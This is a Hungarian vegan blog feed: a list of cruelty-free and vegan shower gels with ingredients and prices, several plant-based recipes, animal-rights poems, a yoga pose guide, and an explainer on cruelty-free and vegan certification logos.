leírását az alábbi cikkben találod, alább pedig ABC sorrendben a Magyarországon kapható cruelty free és vegán tusfürdőket. Női és férfi erőszakmentes/vegán tusfürdők Alterra Naturkomsetiks vegán tusfürdő Összetevők: Aqua, Alcohol, Glycerin, Coco glucoside, Cocos nucifera fruit, Xanthan gum, Glyceryl oleate, Silica, Disodium cocyl glutamate, Carica papaya fruit extract, Aloe barbadensis leaf powder, Parfum, Limonene, Sodium cocoyl glutamate, Citric acid Vegán típusok: Papaya és kókusz Hol kapod? Rossmann Ár: kb. 900 Ft Alverde vegán tusfürdők Összetevők: (illattól függő) Aqua, Sodium Coco-Sulfate, Glycerin, Lauryl Glucoside, Sodium Lactate, Maris Sal, Sodium Cocoyl Glutamate, Disodium Cocoyl Glutamate, Olea Europaea Fruit Extract*, Aloe Barbadensis Leaf Juice*, Calendula Officinalis Flower Extract*, Alcohol*, Parfum**, Limonene**, Linalool**, Citral**, Citronellol**, Geraniol** Típusok: Grapefruit és bambusz, Olíva és aloe vera Hol kapod? DM Ár: kb. 600 Ft Bettina Barty erőszakmentes tusfürdők Összetevők: (típustól függő) Aqua, Sodium laureth sulfate, Cocamidopropyl betaine, Sodium chloride, Coco-glucoside, Parfum, Glycreyl oleate, Citric acid, Sodium benzolate, Styrene/acrylates copolymer, Alantoin, Potassium sorbate, Peg-120 methyl glucose dioleate, Polyquaternium-7, Hexyl cinnamal, Tetrasodium edta, Glycerin, Limonene, Pyrus malus juice, CI 15510, CI 16035. Típusok: Alma és fahéj, kókusz és lime, málna és kivi Hol kapod? Rossmann Ár: kb. 1500 Ft / 500ml CD erőszakmentes tusfürdő Összetevők: Aqua, Sodium laureth sulfate, Glycerin, Cocamidopropyl betaine, Sodium Chloride, Parfum, Nympaea alba flower extract, Coco-glucoside, Glyceryl oleate, Hydroxypropyl, Guar hydroxypropyltrimonium chloride, Citric acid, Sodium benzoate, Limonene, Hexyl Cinnamal, Linalool Hol kapod? Rossmann, Tesco Ár: kb. 650 Ft Dermax erőszakmentes tusfürdő Összetevők: Aqua, Sodium laureth sulfate, Cocamidopropyl betaine, Cocamide DEA, Glycerin, PEG-7 glyceryl cocoate, Polyquaternium 7, Sodium lactate, Allantoin, Phenoxyethanol, Citric acid, Sodium benzoate, Tetrasodium EDTA, Sodium chloride Hol kapod? DM, Tesco Ár: kb. 800 Ft Dr. Organic vegán tusfürdők Összetevők: (illattól függő) Aloe barbadensis leaf juice, Aqua, Cocamidopropyl betaine, Sodium cocoamphoacetate, Sodium lauroyl sarcosinate, Caprylyl/Capryl glucoside, Disodium lauryl sulfosuccinate, Coco glucoside, Glyceryl oleate, Lauryl glucoside, Cocos nucifera fruit extract, Carica papaya (papaya) fruit extract, Mangifera indica (mango) fruit extract, Theobroma cacao (cocoa) seed extract, Garcinia mangosteena (mangosteen) fruit extract, Ficus carica (fig) fruit extract, Citrus aurantium dulcis, Citrus aurantium bergamia (bergamot) fruit oil, Citrus limon peel oil, Gamma undecalactone, Maltol, 3-hexenol, Gamma octalactone, Diacetyl natural, Sodium hydroxymethylglycinate, Potassium sorbate, Ascorbic acid, Citric acid, Limonene Típusok: Gránátalma, Szűz kókuszolaj, Teafaolaj, Olívaolaj, Aloe vera Hol kapod? DM, Tesco, Müller Ár: kb. 1900 Ft Isana vegán tusfürdők Összetevők: (illattól függő) Aqua, Sodium laureth sulfate, Cocamide DEA, Cocamidopropyl betaine, PEG-7 glyceryl cocoate, Mentha avensis oil, Panthenol, Glycerin, Critic acid, Parfum, Sodium chloride, Sodium benzoate, Potassium sorbate, Styrene/Acrylates copolymer, Coco-glucoside, Testrasodium glutamate diacetate, Benzoic acid, Sodium hydoxide, Sodium polynapthalenesulfonate, Citral, Limonene, Linalool, CI-11680 Vegán típusok: Lady Lemon és Mademoiselle Raspberry Hol kapod? Rossmann Ár: kb. 500 Ft / 500ml Kneipp vegán habfürdők Összetevők: (illattól függő) Aqua, Sodium laureth sulfate, Cocamidopropyl betaine, Parfum, Peg-40 sorbitan peroleate, Peg-18 glyceryl oleate, Coco-glucoside, Glycerin, Papaver orientale seed oil, Cannabis sativa seed oil, Citrus nobilis peel oil, Citrus aurentium bergamia fruit oil, Olibanum, Limonene, Geraniol, Citric acid, Tocopherol, CI-16255, CI-42090 Vegán típusok: Vörös mák és kender, Levendula és vanília, Gránátalma és amaránt olaj, Rebarbara és rózsa, Maracuja és grapefruit, Eukaliptusz és menta Hol kapod? Müller, Tesco Ár: kb. 1500 Ft Lavera basis sensitive vegán tusfürdők Összetevők: Aqua (Water), Sodium Coco-Sulfate, Ammonium lauryl sulfate, Lauryl glucoside, Maris sal, Betaine, Calendula officinalis flower extract, Equisetum arvense leaf extract, Algae, Melissa officinalis flower extract, PCA glyceryl oleate, Lauroyl lysine, Alcohol, Parfum, Limonene, Geraniol, Linalool, Citral, Citronellol, Hol kapod? Müller Ár: kb. 1400 Ft Neobio vegán tusfürdők Összetevők: (típustól függő) Aqua (Water), Sodium Coco-Sulfate, Coco-Glucoside, Lauryl Glucoside, Glycerin, Betaine, Aloe Barbadensis Leaf Juice*, Citric Acid, Caffeine*, Camellia Sinensis Leaf Extract*, Potassium Sorbate, Sodium Chloride, PCA Ethyl Cocoyl Arginate, Parfum (Essential Oils), Limonene Kálium-szorbáttal tartósítva *ellenőrzött bio termesztésből Vegán típusok: Koffeines zöld teás, Narancsos lime-os, Gránátalmás orchideás Hol kapod? Rossmann, Müller, nagyobb DM-ek Ár: kb. 1000 Ft Original Source vegán tusfürdők Összetevők: (típustól függő) Aloe barbadensis leaf juice, Aqua, Cocamidopropyl betaine, Sodium cocoamphoacetate, Sodium lauroyl sarcosinate, Caprylyl/Capryl glucoside, Disodium lauryl sulfosuccinate, Coco glucoside, Glyceryl oleate, Lauryl glucoside, Cocos nucifera fruit extract, Carica papaya (papaya) fruit extract, Mangifera indica (mango) fruit extract, Theobroma cacao (cocoa) seed extract, Garcinia mangosteena (mangosteen) fruit extract, Ficus carica (fig) fruit extract, Citrus aurantium dulcis, Citrus aurantium bergamia (bergamot) fruit oil, Citrus limon peel oil, Gamma undecalactone, Maltol, 3-hexenol, Gamma octalactone, Diacetyl natural, Sodium hydroxymethylglycinate, Potassium sorbate, Ascorbic acid, Citric acid, Limonene Vegán típusok: Málna és vanília, Teafa és mentol, Lime, Kókusz, Narancsolaj és gyömbér, Levendula, Csokoládé és menta, Menta és teafa, Citrom és teafa, Grapefruit, Kókusz Hol kapod? DM, Müller Ár: kb. 600 Ft / 250ml Sante Naturkosmetik vegán tusfürdők Összetevők: (típustól függő) Aqua, Lauryl Glucoside , Coco-Glucoside , Sodium Coco-Sulfate, Aloe Barbadensis Leaf Juice, Glycerin, Inulin, Sodium Chloride, Glyceryl Oleate , Sorbitol , Citric Acid, Polyglyceryl-10 Laurate , Betaine , Sodium Cocoyl Glutamate, Disodium Cocoyl Glutamate, Lycium Barbarum Fruit Extract, Citrus Limon Peel Extract, Levulinic Acid, p-Anisic Acid, Phytic Acid, PCA Ethyl Cocoyl Arginate , Sodium Levulinate , Parfum , Limonene , Citral Típusok: Goji bogyó és citromkivonat, Gránátalma kivonattal, Mályvavirág kivonattal, Sheavajjal, Citrom és papaya kivonattal Hol kapod? DM, Müller Ár: kb. 2000 Ft Speick men vegán tusfürdők Összetevők: Aqua, Sodium C14-16 Olefin Sulfonate, Cocamidopropyl Betaine, Glycerin, Sucrose Cocoate, C12-13 Alkyl Lactate, Hydrolyzed Wheat Protein, Hydrolyzed Wheat Gluten, Panthenol, Valeriana Celtica Extract, Salvia Officinalis Extract, Parfum, Sodium Sulfate, Sodium Chloride, Sodium Benzoate, Potassium Sorbate, Citric Acid, Alcohol ,Citral, Limonene, Linalool Hol kapod? Müller Ár: kb. Ft Terra Naturi vegán tusfürdők Összetevők: Aqua, Helianthus Annuus Hybrid Oil, Coco-Glucoside, Cetearyl Alcohol, Glyceryl Stearate Citrate, Glycerin, Caprylyl Caprylate, Tocopherol, Punica Granatum Seed Oil, Parfum, Disodium Cocoyl Glutamate, Chondrus Crispus Powder, Polyglyceryl-10 Laurate, Xanthan Gum, Sodium Cocoyl Glutamate, Sodium Cocoate, Sodium Benzoate, Glyceryl Caprylate, Potassium Sorbate, Limonene, Linalool, Citric Acid, Sodium Chloride Vegán típusok: Aloe vera és kókusz, Narancs és menta, Vadrózsa és mandula, Lime, Gránátalma, Kakaó és vanília Hol kapod? Müller Ár: kb. 600 Ft The Body Shop erőszakmentes tusfürdők A The Body Shop cég büszkén vállalja, hogy semmilyen termékét és termékeinek összetevőit sem tesztelik állatokon, ezzel az értelmetlen állatkínzás ellen foglalva állást. Ugyanakkor, ha vegán vagy érdemes odafigyelned, mivel számos termékük tartalmaz állati összetevőket, főleg mézet. Hol kapod? The Body Shop Ár: kb. 1600 Ft és 4500 Ft között Treaclemoon vegán tusfürdők Összetevők: (illattól függő) Aqua, Sodium laureth sulfate, Cocamidopropyl betaine, Cocamide DEA, Sodium chloride, Glycerin, Pardum, Phenoxyethanol, Sodium benzoate, Potassium sorbate, Styrene/acrylates copolymer, Citric acid, Xanthan gum, Polyquaternium-7, Coumarin. Vegán típusok: Kókusz, eper, vanília, levendula, mangó, citrom Hol kapod? Müller, Tesco Ár: kb. 800 Ft / 500ml Amennyiben hiányosnak találod a cikket, illetve tudomásod van egyéb vegán vagy erőszakmentes tusfürdőről, kérlek jelezd felém! A Vegán tusfürdők cikket körülbelül fél évente tervezem frissíteni árakkal és termékekkel. Legutolsó frissítés 2016 március.
Színes mandulasajt húsvétra
2016. március 13. Gitta nyersétel blogja
A nyerskonyhában nem használunk, nem festünk tojást, de a hangulat kedvéért készíthetünk színes ételeket, amik méltán aratnak nagy sikert, ha vendégeink meglátják. Színező anyag lehet bármi, fűszerek, szuperételek, friss vagy aszalt zöldségek, prémium szárítmányok. Elég csak körülnézni a konyhában, biztosan találunk színes zöldségeket, szuperétel porokat, amik alkalmasak lesznek a fehér sajtgolyót szépen megszínezni. Színes gombócok, tojás helyett Hozzávalók 12 darab kisebb sajtgolyóhoz (kb 2 adag) 20 dkg hámozott (blansírozott) mandula 1 liter tiszított víz 1 evőkanál inaktív sörélesztő pehely, 1 evőkanál utifűmag héj 1 teáskanál só a színezéshez cékla, sárgarépa, curry, pirospaprika, spirulina, bűzafű, stb... Mandulasajtot többféleképpen is elő lehet állítani. A Valentin napi receptek között már találkozhattunk az egyik fajtával. Ez most egy másik megközelítés, és azért, mert az így kapott sajt sokkal világosabb, szinte majdnem fehér, amit sokkal jobban be lehet színezni a különböző fűszerekkel, zöldségekkel. káprázatos színekA mandulából először mandulatejet készítünk: simára, teljesen simára turmixoljuk a mandulát először annyi vízzel, amennyi éppen ellepi. Ha már nincsenek benne darabok, akkor felönthetjük a maradék vízzel. Nylon szűrőzsákkal leszűrjük, jó erősen kinyomkodjuk... A mandulatejből naranccsal, sárgarépával káprázatos színű ital készíthető :) Ha nem készítjük el a narancsos-répás receptet, akkor a mandulatejet hígíthatjuk még egy kis vízzel, mert így elég tömény, és édesíthetjük mézzel, ízesíthetjük vaníliával, lucumával, macával. Az ételkészítő jól megérdemelt jutalma, hogy a konyhában végzett kreatív munkájáért cserébe elkortyolgathatja ezt a nagyon finom italt, ami tulajdonképpen a mandulasajt előállításának egy mellékterméke :) szerencsére :) A visszamaradt mandulapépet ízesítjük sóval, sörélesztő pehellyel, és belekeverjük az utifűmag héjt is. A masszát kicsit félretesszük. Nézzünk körül otthon, mivel tudunk színesíteni - élénk rózsaszín: cékla (friss vagy porított változat is megfelel) - sárga: kurkuma (egyre népszerűbb fűszer) - sárga egy másik árnyalata: curry por (egy kurkuma alapú fűszerkeverék, kicsit más a színe, mivel ebben a fűszerkeverékben a kurkumán kívül más fűszerek is vannak) - piros: a jó magyar pirospaprika - liláskék: acai bogyó (por alakban lehet hozzájutni, nagyon magas antioxidáns tartalma miatt egyre népszerűbb. Minősége miatt a PlanetBIO márkájú Acai port ajánlom) - világoszöld: búzafű vagy árpafű por (ezt is lehet már por alakban is kapni) - mélyzöld: spirulina alga por (magas tápértéke miatt egyre többen fogyasztják, keressünk olyan spirulinát, amiben egyáltalán nincs higany. Ilyen például a PlanetBIO spirulina algája) - apróra vágott zöldfűszerekkel fehér-zöld pöttyös gombócot kapunk - lehet keverni a sárgát és a pirosat, vagy a világos- és a sötétzöldet, vagy a megszínezett mandulasajtot meg lehet forgatni darabos fűszerkeverékben. A masszából kanállal egyforma nagyságú gombócokat szaggatunk, majd attól függően, hogy hány színünk lesz, és mennyi gombócunk, akár egyenként is belekeverhetjük a színező anyagot, akár több golyót összegyúrhatunk a fűszerrel, és újra jöhet a gombóc-készítés. Hagyjunk egy két gombócot fehéren is... az is egy szép szín A színes gombócok nem csak a színükben fognak különbözni, hanem mindnek más és más lesz az íze is. Vendégeink nem győzik majd kóstolgatni, felezgetni (hogy minél többeknek jusson belőle), és tanakodni, hogy vajon mi a titka a színeknek, ízeknek... találgatják majd :) :) :) . A gombócokat kínálhatjuk salátához, vagy csak úgy gúlába halmozva, szépen egymás tetején... Fotó: Birta Endre Tálaljuk salátával
Chilis rántott karfiol gyömbéres-mogyoróvajas szósszal
Ma ismét egy tradicionális ősmagyar street foodot sikerült összeügyetlenkednem. A hagyományos ízvilág önkéntelenül is kihúzta lelkem tévéantennáját, melyen csak délutáni Duna TV-s kívánságműsorokat sikerült befognom. Ennek szellemében tehát, amíg az alábbi receptet leírom, kérném a Bagzó tacskó vakkantott a mármarosi határban című magyarnótát Kerékgyártó-Kutas Rezső előadásában. Küldeném édesanyámnak, Paszternák Kálmánnének Tatárkankóra, Pötyi néninek és lányának, Eutanáziának, valamint perzsamacskájuknak, Mircinek Kancahergelőre. Alkotóelemek: 1 fej karfiol 1/2 csésze liszt 1/4 csésze langyos víz kevés só 1/2 uborka pálcikákra aprítva A chilis bevonathoz: 2 ek olívaolaj 2 ek chiliszósz 1/4 csésze rizs- vagy fehérborecet 1 tk szójaszósz Hovatovább a szószhoz: 3 ek mogyoróvaj 2 ek rizs- vagy fehérborecet 2 ek citromlé 2 tk reszelt gyömbér 1 ek szójaszósz 1 tk agaveszirup (de bármilyen hasonló állagú, édeskés gyász megteszi) kevés langyos víz A sütőt előmelegítjük 230 fokra. A karfiolt kérdezősködés nélkül rózsáira cincáljuk, ódzkodjunk a túl nagy szeletektől, mint zsiráf a mackóalsótól! A víz, liszt és kevés só elegyéből csomómentes vegyületet alkotunk, ha túl száraznak találjuk, további langyos vízzel regulázzuk. Miután negyed óráig állni hagytuk, a karfioldarabokat rutinosan megmártjuk benne, majd egy hőálló üvegtálba halmozzuk őket. Sütőbe tesszük, összvissz negyed óráig hagyjuk bent, nem tovább. Közben előkészítjük a chilis elegyet oly módon, hogy az összetevőket egy serpenyőbe öntjük, majd kevergetjük, és felmelegítjük. (Nem forraljuk fel, mert bajok lesznek, világos?) Kivesszük a karfiolt, egy ún. tálba halmozzuk, majd az imént említett löttyel kíméletlenül nyakon öntjük és összerázzuk. Majd visszatesszük a sütőbe további 3-4 percre. De addig sem limbózunk a konyhában saját szórakoztatásunkra, hanem a mogyoróvajas szósz összetevőit összekeverjük egy tálban, végül annyi vizet adunk hozzá, hogy krémes állagú legyen. A kész művet felnyiszatolt uborkával szervírozzuk, hogy joggal vádolhassanak minket hatásvadászattal!
Kurkumás amaránt kása (vegán) – Vendégbejegyzés Rakottkert Gabitól
2016. március 8. Zizi kalandjai
Gabi blogját évek óta követem, igazából hamarabb ismertük meg egymást személyesen és csak utána kezdtük el követni egymás blogját. Nem vegetáriánus blogot ír, de nagyon sok vegán és vegetáriánus recept van a blogján. Imádom a stílusát… egyszerűen nem tudom megmagyarázni miért… ahogyan az étellel bánik, ahogyan egy alapanyagból “varázsol” valamit, a letisztultság, a kreativitás mind-mind hozzájárul ahhoz, hogy imádjam. Nem mellesleg Gabi a megalkotója a gyönyörű Kósa Gabi textileknek! Kövessétek, szeressétek őt! “Olyan receptet küldök, amit reggelire, uzsonnára, de akár egészséges desszertnek is el lehet készíteni. Az amaránt nagyon sok jó tulajdonsággal bír, többek között magas a vas és kálcium tartalma, gluténmentes, így lisztérzékenyek is fogyaszthatják. Még a neve is szép: a görög amarantos szóból származik: jelentése: nem hervadó. Szóval nemes alapanyag, amit én kurkumával fűszereztem, bevallom, főleg a színe miatt. Szépen megsárgította a kis gyöngyszemeket, így még jobban mutat mellette a mélyvörös málna, a zöld pisztácia és a fehér kókusz. Jön a nyár nemsokára, vele a friss gyümölcsök - bármelyikkel finom lesz majd!“ Kurkumás amaránt kása Hozzávalók: – 100 g amaránt – 1/2 kávéskanál kurkuma – 1-2 evőkanál juharszirup vagy méz – csipet só – 50 g málna (fagyasztott is lehet) – 1 evőkanál barna nádcukor – 1 marék natúr pisztácia – 1 marék pekándió – 2 evőkanál kókuszpehely – pár szem egész málna Az amarántot 250 ml vízzel és egy csipet sóval időnként megkeverve puhára és sűrűre főzzük. Ízlés szerint juharsziruppal vagy mézzel édesítjük. A málnát egy evőkanál vízzel és a cukorral megpároljuk, átpasszírozzuk. A pisztáciát és a pekándiót durvára vágjuk. Az amaránt kását tálba tesszük, ráöntjük a málnakrémet, megszórjuk a magokkal és a kókuszpehellyel. Egész málnákat teszünk a tetejére. Langyosan a legfinomabb.
Nora Cochrane: Gondold újra!
Tejtermékek sokasága áraszt minket el, De gondolkodtál már-e azon, mi is az a Tej? Megszületvén ezzel nyújt az Anya teste életet, Egyedül csak neked készült, mindez a te érdemed. Mi folyik itt – kérdem én – hogy boltban adják el? Hol van a sok Újszülött, és nekik miért nem kell? Hadd áruljak el egy titkot, mit a szívem hozott: Amit pénzért veszel, annak minden cseppje lopott! A Gyerekeket pedig ekkor kár is lesz már keresned, Ők ebben az iparágban nem mások, csak felesleg. Vérző szívű Anyák ezrét szipolyozzák bután, S ha szenvedésük lejárt, mennek gyermekeik után… Mi vagyunk az egyetlen faj, akárhogy is nyomaszt, Ki felnővén egy másik fajtól anyatejet fogyaszt. De megennél-e bármit is, kérlek gondolj bele, Amiben az összetevő: kutya/macska teje ? Elvennéd-e előlük, vagy főznél inkább mással? Ahogy döntesz, életekre lesz majd hatással. The post Nora Cochrane: Gondold újra! appeared first on VegaNinja.
Tégy a gerinced egészségéért! - Ardha Csandrászana (Fél hold állás)
2016. március 3. Élj harmóniában
Ardha Csandrászana Az Ardha Cs andrászana (félhold állás) jól kompenzálja az ülő munka okozta hatásokat, segít javítani a testtartást. Erősíti a lábakat, stabilizáló izmokat. Nyújtja és erősíti a gerincet, a hátat is. Ez a jógapóz jól energetizálja a testet, serkenti a szív és a tüdő munkáját. Hogyan végezd el? - Állj meg összezárt lábakkal - Tádászanában (hegytartásban) - ha ez még nehéz akkor lehet csípő széles terpesz a két lábad között. - A két talpadon egyformán oszlasd el a testsúlyt. Majd aktivizáld a lábakat. talpakat told le jól a matracba, húzd fel a térdkalácsokat és legyenek aktívak a combjaid is. - A medencédet tartsd stabilan - aktív a hasizom, farizom. és nyújtóz z hosszan az egész gerinceddel fölfelé. - Emeld a két kezed a magasba - ha tudod tedd össze a tenyereket, ha ez még nehéz, akkor vállszélességben maradhatnak a karok. - Belégzéssel dönts hátrafelé - figyelj rá, hogy a medencédet ne told előre - homorítsd a hátad - A két karod és a fülek egymás mellett, egy vonalban maradjanak - ne ejtsd hátra fejed Kijövetel a pózból belégzéssel gyere vissza középhelyzetbe és engedd le a karjaidat. A kitartás alatt stabilan tartsd a lábakat és a medencédet. Kilégzéssel a külső talpéleket és a nagylábujj tövét told a talajba. B elégzéssel húzd fel a térdkalácsot, tartsd aktívan a combokat. Belégzéssel próbálj nyújtózni fejtetővel, sz egycsonttal éa a karokkal is az ég irányába. A hasadat, derék táji szakaszt, medencédet tartsd végig stabilan. A picit behúzott farokcsontb ól nyújtózz az egész gerincoszloppal folyamatosan. A lapockáidat simítsd a hátadba és próbáld belégzéssel nyitni a mellkast folyamatosan azáltal, hogy távolítod a két kulcscsontot - úgy dolgozz, ahogy Tádászanában (A tádászanáról itt olvashatsz). Amennyiben gerincsérved van óvatosan végezd a pózt, vagy ha kellemetlenséget érzel hagyd ki teljesen. Tüdőtágulat esetén és kezeletlen magas vérnyomás esetén se gyakorold ezt a pózt. Akkor se gyakorold ezt a pózt ha szédülsz, érszűkületed, esetleg érelmeszesedésed van, vagy valami gond van a központi idegrendszereddel.
Édesköményes lepény
2016. március 1. Élj harmóniában
Az édeskömény áldásos hatásairól már írtam a blogon. ( itt olvashatod). Mivel minden ájurvédikus testtípus számára kedvezően hat, így bárkinek szerepelhet rendszeresen az étrendjében. Most egy nagyon gyors, egyszerű zöldséges lepényt készítettem vele. Gyakran használom ezt az alapreceptet, amikor olyan ételt kell csinálni, ami hamar elkészül, kevés edényt kell használnom és az elkészült étel laktató és könnyen szállítható:) Hozzávalók 1 csomag sütőpor 1,5 bögre teljes kiőrlésű tönkölybúzaliszt 1,5 bögre tönköly fehérliszt 1 nagyobb gumó édeskömény 5 ek. olívaolaj (vagy kókuszzsír) 1 tk. szódabikarbóna oregánó bazsalikom kakukkfű só bors 1,5 bögre víz koktélparadicsom a tetejére díszítésnek Az előkészítéshez mosd meg a paradicsomokat és az édesköményt . Az édesköményt szedd cikkekre és vágd darabokra. A liszteket , sütőport, szódabikarbónát, fűszereket keverd össze egy tálba, majd az olajat tedd hozzá . Önts hozzá vizet fokozatosan és keverd jól el - figyeld a tészta állagát van amikor elég 1 bögre víz van, hogy sokkal több kell a liszt függvénye). Gyorsan dolgozz, hogy a száraz hozzávalók ne legyenek sokat a nedves hozzávalókkal. A végén keverd bele az apróra vágott édesköményt. Az így kapott masszát öntsd bele egy kivajazott, lisztezett tepsibe és a tetejét rakd ki félbe vágott koktélparadicsomokkal. kb. 180 fokon süsd addig, amíg jól átsül és szép arany színe lesz. V egyszermentes (bio) alapanyagokat használj:)
Nora Cochrane: Eredet
Azt mondod bőr – de tudod-e, ki bőre? Tudod-e ki volt a született őrzője? S arra gondoltál-e, hogy az első érintése, Neki sem volt más, mint édesanyja méhe? Az anya, ki vajúdott megannyi kínon át, Szívta be gyermeke bőrének illatát… Akkor ott először, és egyben utoljára, Mert eme gyermeket az Ember másnak szánta… Ma díszes kanapé, cipő vagy bőrkabát, Ennél többet Belőle csak kevesek szeme lát. De én tudom, s már te is, hogy kit takar a festék, Eredetét sajnos tőlünk eddig elrejtették. Most állj hát meg egy percre, és nézd meg jól a kezed, Adj hálát, hogy saját bőröd ott van rajtad, veled, Hiszen ebbe születtél, hozzád tartozik, S gondolj majd azokra, kiktől örökre elveszik! The post Nora Cochrane: Eredet appeared first on VegaNinja.
Hétköznapi kis keksz
2016. február 25. Dulmina tündérkonyhája
Tea mellé, úti elemózsiának, vagy csak úgy elropogtatni egyaránt szeretem ezt az egyszerű tönkölykekszet. Mivel a tészta állaga lehetővé teszi, az antik mézeskalács-formázóval mintázom, de természetesen lehet simán csak vékonyra nyújtani és tetszőleges alakzatokat szaggatni belőle. Hozzávalók: 50 dkg teljes kiőrlésű tönkölyliszt 25 dkg vaj vagy sütőmargarin 15 dkg cukor (ezzel csak alig édes;
Sütőben sült zöldséges köleskása
2016. február 25. Élj harmóniában
Sütőben sült zöldséges köleskásaA köles nagyon sok ásványi anyagot tartalmaz és nagyon kedvezően befolyásolja az emésztést, helyreállítja a gyomor- és bélműködést, segít csökkenteni a vér koleszterinszintjét, táplálja a szöveteket, kitűnő energiával látja el a testet, erősíti az immunrendszert. Ájurvéda elsődlegesen kapha típusúak számára ajánlja. Ilyenkor a tél végén ideális étel mindenki számára. Fogyókúrázóknak különöse jó csemege, mert laktató, így csökkenti az étvágyat és az édesség megkívánását. Gluténmentes, így jól illeszthető gluténmentes diétába. Nagyon jó köretnek vagy kásának, egytálételnek édesen vagy sósan egyaránt. Ez egy egyszerűen elkészíthető köles kása. Leginkább azért egyszerű, mert minden hozzávalót csak be kell helyezni egy hőálló tálba felönteni vízzel és betenni a sütőbe. Utána már csak annyi dolgod van, hogy elfogyasztod:) Hozzávalók: 4*1/3 csésze köles 16*1/3 csésze forró víz 2 sárgarépa 1,5 csésze megtisztított, rózsáira szedett karfiol 1,5 csésze megtisztított, rózsáira szedett brokkoli 1 tk. oregánó 1 tk. bazsalikom 1/2 tk kakukkfű csipet rozmaring só bors 10 dkg vaj (vegán változatban kókuszzsír) Készítsd elő a zöldségeket pucold meg aprítsd fel és tedd félre. A kölest mosd meg egy szűrőbe - addig amíg a víz szép áttetsző nem lesz. A hőálló tálat vajazd ki és szórd bele a köles , a fűszereket és a zöldségeket. Keverd össze jól, majd öntsd fel négyszeres mennyiségű forró vízzel. az egészet. 180 fokra előmelegített sütőben addig süsd, amíg a köles felszívja a vizet (kb. 1 óra) a teteje pedig picit pirulni kezd. Tálalhatod magában vagy tejföllel, joghurttal is. Vegyszermentes (bio) alapanyagokat használj:)
Mi a különbség a Cruelty-free és a Vegán kozmetikumok között?
Vegánok között is gyakran felmerül a cruelty-free termékek kérdésköre. CF listákat linkelünk egymásnak, keressük a “nyuszis” logót, melyekből kitűnik, hogy sajnos sokan élnek abban a tévhitben, hogy a cruelty-free jelölés állatok kihasználásától teljes mértékben mentes terméket jelent. Mielőtt megosztjuk kedvenc kozmetikumainkat és házi praktikáinkat, fontosnak tartjuk tisztázni a CF és VEGÁN termékek közötti különbségeket és esetleges átfedéseket.
CRUELTY-FREE = nem tesztelték állatokon
VEGÁN = nem tartalmaz állati eredetű összetevőket
Alapvetően három csoportra oszthatjuk a cruelty-free és/vagy vegán kozmetikumokat:
CRUELTY-FREE (TESZTMENTES) ÉS VEGÁN
Ennek értelmében a kész terméket és annak összetevőit sem tesztelték állatokon, valamint állati eredetű összetevőktől is mentes.
VEGÁN DE NEM CRUELTY-FREE (TESZTMENTES)
Ezek a termékek nem tartalmaznak állati eredetű összetevőket, ugyanakkor bizonyos alkotóelemeit állatkísérlet keretében vizsgálták. Ide sorolhatunk sok vegán-barát, véletlenül vegán terméket.
CRUELTY-FREE (TESZTMENTES) DE NEM VEGÁN
Ebbe a kategóriába tartoznak a tesztmentes termékek, amelyek tartalmaznak valamilyen állati eredetű összetevőt.
HOGYAN BIZONYOSODHATSZ MEG ARRÓL, HOGY EGY TERMÉK NEM CSAK TESZTMENTES DE VEGÁN IS?
Több szervezet foglalkozik nemcsak élelmiszerek, de kozmetikumok minősítésével is. Összegyűjtöttük, mely szimbólumokat érdemes keresni a termékek csomagolásain.
TESZTMENTES MINŐSÍTÉSI RENDSZEREK – “NYUSZIS” LOGÓK
Choose Cruelty Free (CCF) – Az ausztrál piacra szánt kozmetikumokat, háztartási tisztítószereket gyártó cégeket minősítő non-profit szervezet. A minősítés feltételeit itt olvashatod. Ugyan elsősorban tesztmentes minősítést adnak ki, bizonyos állati eredetű összetevőket felhasználó cégeket nem akkreditálnak. CF-vegán listájukat itt találod, de telefonodon is mindig nálad lehet mobilalkalmazásuknak köszönhetően .
Leaping Bunny (CCIC) – Talán a legismertebb nemzetközi CF minősítés. A gyártó céget egészében vizsgálják, a jelentkezéshez szükséges feltételek listáját itt olvashatod, az ezeknek megfelelt cégeket pedig itt böngészheted. CF akkreditált és egyben vegán cégeket összesítő jegyzékét itt találod (ne felejtsd el x-elni, hogy vegán). Törvény által előírt tesztelést végző cégek nem szerezhetnek jogosultságot a Leaping Bunny logó használatára, valamint a cégek rendszeresen megújítják akkreditációjukat. Ugyanakkor cégek, melyeknek anyacége végez állatkísérleteket, megkaphatja a nyuszis minősítést. Okostelefonod van? Töltsd le az appjukat!
Beauty Without Bunnies (PETA) – Külön tesztmentes, illetve vegán és tesztmentes minősítést is kiadnak kozmetikumokat gyártó cégek részére, már kétféle designt is kereshetünk a termékek csomagolásain. Adatbázisukban számos kritérium szerint szűrheted a cégeket, valamint mobilalkalmazásukat is telepítheted. A termékek tesztelése és a gyártó által megadott adatok ellenőrzése nem képezi részét a minősítési folyamatnak, illetve olyan cég is került már fel listájukra, amelyik a törvény által előírt tesztelésnek eleget tesz, tehát nem teljes mértékben tesztmentes.
A Beauty Without Bunnies régi logója
VEGÁN MINŐSÍTÉSI RENDSZEREK
Vegan Action – Certified Vegan – Logójukat akkreditált vegán és tesztmentes termékek kaphatják, gyártók nem. Így olyan cégeket is megtalálhatsz listájukon, melyek nem vegán termékeket is forgalmaznak, illetve érdemes üzenőfalukat is figyelni, ahol helyesbítéseket adnak közre.
The Vegan Society – Szintén termékeket minősítenek, nem cégeket. A logójukat viselő termékek tesztmentesek és vegánok, megkövetelik a GMO összetevők jelölését, ezek és az előállításhoz használt ipari segédeszközök esetében sem engedik az állati eredetű összetevők felhasználását. 12 és 24 hónapos licenszszerződést kínálnak, így biztosítva a minősítéssel rendelkező termékek rendszeres felülvizsgálatát. Termékekre és cégekre is kereshetsz adatbázisukban.
MI A HELYZET AZOKKAL A TERMÉKEKKEL, AMELYEKEN EGYIK FENTI LOGÓ SEM TALÁLHATÓ MEG?
Számos oka lehet annak, hogy egy termék csomagolásán nincs feltüntetve fent említett CF vagy vegán szimbólum:
A termék nem CF és/vagy vegán
A termék véletlenül vegán
A termék minősített, de a logó külön licenszdíj ellenében használható melyet nem kötelező megfizetni, így egyes cégek egyszerűen nem élnek a lehetőséggel, CF és/vagy vegán státuszukat azonban ellenőrizheted az adatbázisokban.
Van CF vagy vegán szimbólum a terméken, de nem hasonlít a fentiekre.
A fenti nyuszis és vegán szimbólumokat kizárólag színükben módosíthatják a cégek, így az ezektől eltérőeket nem tekinthetjük megbízható minőség garanciának. Érdemes felvenni a kapcsolatot a logó tulajdonosával, valamint a cég képviseletével. Olvass tovább, adunk néhány tippet, hogy milyen kérdéseket tehetsz fel tesztmentesnek és/vagy vegánnak hirdetett termékekkel kapcsolatban.
